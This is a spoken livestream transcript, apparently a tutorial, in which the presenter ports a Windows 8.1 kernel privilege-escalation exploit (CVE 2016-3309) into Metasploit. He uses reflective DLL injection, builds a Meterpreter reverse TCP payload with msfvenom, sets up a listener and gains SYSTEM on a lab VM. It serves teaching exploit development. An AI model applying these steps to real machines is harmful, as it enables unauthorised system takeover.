Okay, now disclosure date, not really sure. So we're going to have to figure out exactly what the disclosure date. So we should be specifying the disclosure date there. Space, yeah, whatever. We don't need to worry about space limitations, so we'll just leave it as the default. I would like to come back and revisit this at some point because I'm not sure that we even need to have this specified. I should also modify the description. This module exploits a vulnerability, I should say an integer overflow vulnerability in Win32k.sys via the rgnobj functionality. The exploit uses GDI objects to manipulate kernel memory and triggers the vulnerability using path objects. God, I can't type tonight at all. This has been tested on Windows 8.1 only, and that'll do for now. Okay, so there's a very basic description. One thing to note is that the name, all of the words in the name have to be uppercased in their first letter, otherwise when you submit a pull request to Metasploit it will complain at you. Okay, so with our basic description done, our check method done, we now need to go and handle the exploit. Now what we can see here is there's actually a bunch of stuff in here that we are going to reuse, we are going to need, and that's why it was a really good thing to base our exploit on. So first of all, if the current session is already elevated, we actually don't need to run the exploit again. If you want another system shell, don't fire the exploit again, just launch Meterpreter separately. Next, make sure that we run the check function and we go, are you okay? From here, we're going to delete the check for sysinfo, right? This is because the check method actually looks at the client architecture already, and if the client architecture is 64-bit, it is fair to assume that it actually is running on a 64-bit version of Windows, so there's no need to do extra checks. Okay, so by default, our standard process when it comes to kernel exploitation is, rather than attempt to elevate the current process, we're going to spin up a new process, reflectively inject our exploit into that new process, kick off the exploit, and if it works, then that process will call back with an elevated shell. The reason we do that is if something goes wrong, and let's say the exploitation process crashes outside of kernel land, not inside, but outside of kernel land, then the new process that we've spun up to handle that exploit will die, but our existing session will not. Back in the good old days, we used to do self-elevation a lot. We're sort of moving now a bit more towards having processes that are dedicated for elevated shells. So, I think it's a better way of doing it, even if it is just a little bit noisier on the wire. So by default, what we do is we launch a new instance of Notepad. We get a reference to that Notepad process, and then we grab our exploit and we fire that down the neck. Basically, we're going to allocate some memory and plonk it into memory in that new process. So this is CVE 20163309, if I'm not mistaken. Let's just quickly check that again. 20163309. Okay, cool. And you can see here this path information is already set for me. Let's take a copy of that. So I'm just reusing what was already there. Now you'll notice that the x64.dll is hard-coded, again, because we're only using 64-bit. So we get this library path and then expand it. And then we say we're going to inject this into the target process. So there's this helper function called inject DLL into process. That helper function, I believe, comes from reflective DLL injection mixin. So that mixin allows us to easily say, hey, here's a process and here's a DLL. Go and reflectively load it for me. And it will return two references. It returns a pointer to the memory where the exploit lives, and it contains a reference to what is it? The offset to where the reflective loader is in memory. Right? So you get the two things. And so after that, what we do, this is where our invocation of DLL main passing in a pointer to our shellcode comes from. So you can see here, we inject into process the encoded payload. So payload.encoded is a Metasploit thing for exploit modules, which gives you a block of memory that contains the chosen payload in its encoded form, just as raw bytes. So what we're saying here is take those raw bytes for the payload that the user has chosen, inject that into the process as well. And so that returns a pointer to a new area of memory. So now we have three things. We have the exploit memory, offset from the start of exploit memory to where the reflective loader function is, and somewhere else in memory where our shellcode payload actually lives. And with those two things in memory, what we want to do is say, right, go and create a new thread in that process. And that new thread needs to start at exploit m plus offset. You'll see that first parameter just there. This bit just here. So the beginning of exploit memory plus the offset to the reflective loader, that's where we're going to start our new thread. So it's invoking the reflective loader on a new thread. And the value that we're passing in, this payload mem, is the value that is going to be given to the exploit when DLL main is called after it's been reflectively loaded. Okay? Right. So that's pretty much it. Relatively simple process so far, right? We've got some more questions. Gonna be fry for work staying up this about the guy's always worth it. Thanks heaps, Ray. Appreciate it, dude. What do we got here? I need to quickly grab some food. See you, Fireheart. Thanks again, mate. Evox disclosure. Ooh, awesome. Vulnerability reported. Evox, you're a legend, mate. Thank you very much. There's our disclosure date. Cheers, Evox. I will put that in now. Disclosure date is April the 4th. Sorry, no, April the 27th, 2016. Thanks, mate. That's super helpful. So maybe we should put this advisory in here as well, hey? So another URL. There we go. Excellent. Evox, that was very helpful. Cheers. Mugu7, did you change the capture on exploit for Win10? What I remember is you needed to bypass the mitigation. That's yes, I actually didn't have to change it. It turns out that the Capcom driver also disabled smap as well, so I actually didn't need to change anything at all. I was under the assumption that I needed to change it, bypass smap, but nope, both smap and smap were bypassed magically already by that driver, so I didn't have to change it. So there you go. Thanks for that question, Mugu. Right, so next up, we need to go back to the root of MSF. Now, let's go MSF Venom. We're going to create a Meterpreter payload that will talk to this local machine. Actually, before we do that, I've got to remember which subnet this thing was on. Let's just have a look. Give me a minute. Yes, we know it crashed. Let's have a look which subnet we're on. 192.168. Okay. 184. So, MSF Venom. Let's just full screen that for a sec. Payload, Windows x64. Meterpreter reverse TCP, because everyone loves that. Lhost 192.168.184.1. L port is 8888 just because. Format is an executable. Output to scratch meterp.exe. Okay, so we're generating a payload that will hopefully point locally. So there we go. Let's 192.184. Yeah, just making sure it was the right IP. Okay, so I've generated a payload. Let's copy that over to our virtual machine. We'll put it on the desktop. Meterp.exe to here. Okay, there it is. So next we're going to need to kick off MSF console. And I like to do this stuff from the command line as well so that it's all very easy. So we'll go use multi-handler, set payload, Windows x64, Meterpreter, reverse TCP, set lhost 192.168.184.1, set of port 8888, set exit on session false, because we don't want the handler to die, run -j. Now, we also, what we want to do is I'm going to get it to automatically move over to this when it loads. So let's go use exploit Windows local. Alright, let's see what happens. So here I am, I'm on the command line, I'm making it so that it fires up a multi-handler that has that listener running. And look at that. So we can see that we've got a job sitting here. Yeah. Reverse TCP. It's expecting reverse TCP on this location. So TCP 192.168.184.1 port 8888. That's really good. But more importantly, you notice that it didn't crash or complain when we fired up our new module. So here we go. It's got all the metadata that we're expecting. Looking pretty good. Okay, let's make sure that we can actually get a low privilege session. There we go. Ooh, check that out. See this? These are clearly binaries that are left over from before. So what I'm going to do is I'm going to kill those sessions. I'm going to exit. I'm going to get rid of all of the DLLs in the data Meterpreter directory, because when I'm working on Meterpreter and I'm recompiling the binaries, the easiest way to actually test your binaries is not to locate the gems that are on disk and copy over the top. Is to drop it in this data Meterpreter folder, because Metasploit looks in there first, and as you can see, if it finds them, it tells you that it's using them so that you know that you're using a development/debug version of your DLLs, but it's way better than trying to overwrite the gem sets. So we'll do that, and now you know why I do this on the command line, so that when I restart SF, I don't have to type all that stuff in again. Okay, that's all looking good. What do we got here? Sorry, what are you building? Okay, Matt is back. We are building a Metasploit version of a local privilege escalation exploit for Windows 8.1. And if you show on the box where you can test the new OP module, yep, Atari is correct. Basically, I've just created a handler and a binary that we can run. So let's just kick off another Meterpreter session. Now, as I said, I mean, we all know, based on what we've talked about so far, is that the assumption here is that you're already on the machine. And from there, we want to be able to go from a low priv user to a higher priv user. Okay, so sessions. Okay, so we can see, sessions 1. Okay, so if I try to call get system here, it should fail, because that user does not have permission to extract a system token, because we're not privileged enough. Okay, so let's see if we can fix that. So we call set session 1, set payload. I probably should have done set payload here as well, hey. Set payload Windows x64 Meterpreter reverse TCP. Should have done this on the command line. Set lhost. Oh, I don't think I need to set lhost, do I? Yeah, I did. I was hoping it would already pick it up. So what I'm going to do is I'm going to set lport 8888. I'm going to set lhost to 192.168.184.1, and I'm going to disable the payload handler. Basically what I'm doing here is I'm saying I've already got a handler listening, I don't need another one, and I've configured this exploit so that it will fire the payload at my existing handler instead of starting another one. Okay? Right, so we're pointing our exploit at session 1. We are saying kick off a new Meterpreter 64-bit reverse TCP back on this address on this port. And with a bit of luck, everything will just work. So, moment of truth. We're basically an hour and a half into our session. Fingers crossed. Ooh, something's missing. So this path was incorrect. Righto. So let's fix that. Okay, so we need to go cd code, Metasploit framework. In a second, I'm going to run that again. Metasploit framework, data exploits, cd cbe 2016. The folder's not there. That's interesting, because it should have been created. Okay, so make directory cde 2016-3309. Now, when we compile our project over here, Let's rebuild it. It should, see how it says one file has been copied. If you'll notice when we look at our solution properties, our configuration properties for the project, there should be a post build event. And this post build event says, oh, look at that, we missed something. That would be why. And it would, I think, what's clear is that I've actually got to fix up this template a little bit more, because what I actually want to pull out here is the name. So if we look at the macros, see this assembly name? There's a bunch of other ones that we can use as well. But assembly name is probably what I will go with. So wherever I see this Windows LPE, we want $assembly name, like that. So that should actually create the folder for us. That was the intent of this, clearly, and I failed. I failed at stuff. Never mind. Okay. Let's save that. And rebuild. So we should see file copied again. This time, let's, there you go, the DLL is actually in the right spot now. Right. Fingers crossed. Let's see what happens. Launching Notepad to host the exploit. So it's done all the things that we would expect, but we're not actually seeing a session, which probably means that... Ooh. It didn't blue screen. It didn't blue screen, so something hasn't actually functioned as we were expecting. Let's see if we can figure out why that's the case. From what we can tell here, pretty good exploit finish wait first. So that actually ran. It did create the process, as we can see by looking at. See how we've actually got Notepad running. There's a few notepads running. What is this doing here? Wonder if I can close that one. Okay, let's fire it off again. And we should see, there you go, there's our Notepad. So Notepad's been launched. It's actually injected things in like we would expect. And it's kicked off the thread. So the question is, why isn't it actually running? So let's see if we can figure out why that's the case now. Maybe it's because of something like this. Maybe we're actually executing and we're bailing out early. Let's have a look. So get DC, maybe one of these checks here actually is causing a break. So let me just comment out these breaks here and see if that actually makes a difference. I would assume that perhaps I'm making an assumption such as this break here, that bailing out early is the right thing to be doing. Oh, hang on, check it out. Look at that. I'm not executing the payload. Let's undo those. So, I left this here, commented out. What an idiot. Let's build it again. This time, it's actually looking good. Alright, let's try that again. So that's already been copied over. Let's see what happens. Oh, here we go. We've got a new one, and check it out, it's running a system. Sessions -1, sysinfo, and get UID. Boom! NC authority system. Fabulous. So 2556, so we can see, there you go, 2556. This is the process that we're currently running under. Thankfully, because the session is still running, we don't actually have issues with crashes just yet. But yeah, there you go. So as you can see, it's actually not that confusing, right? The bulk of the work has already been done in so many modules, and there's lots of helper functions to help make this actually happen really, really easily. And I think the process is mapped out fairly well, particularly with the later versions of the NSF modules, and hopefully now with this exploit template, which clearly I need to fix up slightly because I failed to include that assembly name thing. But I will fix that. Anyway, does anyone have any questions? Is there anything about what we've done that doesn't make sense? Is there something that I haven't covered that you guys would like me to cover? But in effect, at this point, what I would normally do, assuming that the exploit functions correctly every time. Now watch this. If I hit exit, ooh, it didn't crash. Wow, why didn't it crash? Okay, that's really interesting. I was expecting it to blue screen, but it didn't crash. That's fabulous. Let's run it again. Is it gonna work? Ah, check it out. Sessions -1. Whoops. How exciting. Look at that. It's repeatable. I have no idea why the console version crashed. Maybe there is something going on with, let's see, let's just go back to the original exploit. Maybe there's something in here when exiting. Maybe there's just something like in here that's killing it. I wonder if like a clean exit process or exit thread or something like that would result in something different. Anyway, that's pretty interesting, I think. Hello, It's like, yeah, it is like, how about that? It is like Christmas happened again. So, okay, so Mugu, it actually is set to exit thread, I think, by default based on the payload, right? Exit func is currently set to thread. What is the go? So if that's the case, why is the process actually disappearing? That's interesting, isn't it? Why is the process disappearing if we exit thread? Maybe it is actually passing through exit process when it shouldn't be. That may actually be an issue as well. That could be a bug. That's something for me to look into later on. But yeah, anyway, there you go. There you go, guys and gals. Thanks to everybody who's come along. Let me just make sure that I have answered all of these questions. Okay, so I just came. What is this program meant to do? Okay, so I'll be very brief if I get these questions because we've answered them a number of times already. But the program is meant to take an existing local privilege exploit, local privilege escalation exploit that works on Windows 8.1 64-bit and port it so that it works inside the Metasploit framework. If the exploit wouldn't have worked, how would you debug it on Windows? Well, to begin with, what I would have done is Harisec. Is it Halsec or Harisec? I think what I would have done to begin with is just add some debug output strings. So I would have called the output debug API and then fired up debug view from sysinternals, and that would have just given me at least an idea of the thing, the point that we would have got to at where it was bailing out. But I don't usually do that unless there are issues. From there, I would look to identify exactly which line and then sort of work my way backwards to figure out why that may or may not have functioned as we would have expected. From there, it's a case of let's go that way and see what happens. If it got to a point where it was actually kernel land where it was causing problems, I may well have just put it on ice, because I wouldn't have, like right now, I haven't got my environment in Linux set up so that I can do Windows-based kernel debugging inside of VMware machine. When I do my Windows-based stuff, I have my Windows 10 host. I have VirtualBox with the target running, and I use virtual KD to do kernel debugging. And that is something that we're going to be diving into over the coming weeks. I want to take people from having a host machine, installing VirtualBox, getting the kernel debugging environment all set up, and then going through this exact exploit, understanding the difference in the patches that people manage to reverse engineer, and we want to do exactly the same thing. Use something like bindiff to figure out which functions changed, isolate the bug, figure out what caused the bug and the code path that we can use to get to the bug, crash, and do all those kinds of things, and get to the point where we can do the heap grooming all the way down to actually getting a working exploit like what we have now. But the goal there is to understand every step of the way. You know, what is pageable memory in the kernel? What does the overflow do? How are we using GDI objects in the kernel to manipulate the bits in the kernel behind the scenes and steal tokens? You know, how does the overflow allow us to read and write memory? Things like that. So that's the aim. So we all have a really good understanding. It's going to be painful, and it's something that you know, I'm going to be learning a lot from as well. But it should be good. Okay, VirtualBox null mode. Yes, I'm afraid so. But debugging the kernel through VirtualBox related stuff is much easier, and I don't have a license for VMware on Windows, so VirtualBox is free, and it works. Mugu, good day ported exploit. Yes, any day that you can port an exploit without firing up the debugger is indeed a good day. Where are we at? Nice. Hacks. Is that supposed to drop another listener to cache? No, as I said, the aim there was just to reuse the existing one. William307, g'day. Are you using Kali in CLI? No, I'm not. My host machine is Fedora. Where are we? Let's kick off another one of these. I am using Fedora 64-bit, currently on version 24. I haven't brought myself to upgrade to 25 yet, because apparently there's some changes in graphics related shenanigans that I don't want to fight. So yes, I am a Fedora user, have been for a while, and I'm rather happy. What exploit is get system? Okay, the fridge master, I don't know you, but you're in my bad books already. Get system is not an exploit. I don't recognize your name, but I get the feeling I'm being trolled by someone who knows that I always get trolled by the get system exploit. And by the looks of it, that's all of the questions. So unless you guys have any more, I'm going to call it a night. But thanks again to everyone coming along. I've had a decent turnout. We've sort of sat around 60 to 70 people watching for most of the evening, which is fabulous. And this is the first one that I think has come in well under 2 hours. Usually they go for another 2, sometimes 3. And I think future streams are probably going to end up being broken up into like 2-hour chunks to try and make them a bit more digestible. So certainly when it comes to this kernel stuff, because it can be a bit hair-raising. So yeah, thanks a lot. Much appreciated. Love you all. Love your support. And if you have any questions, hit me up. I'm the Colonial on Twitter. I'm more than happy to help out and hopefully demystify things for you even more. So peace and happy exploiting.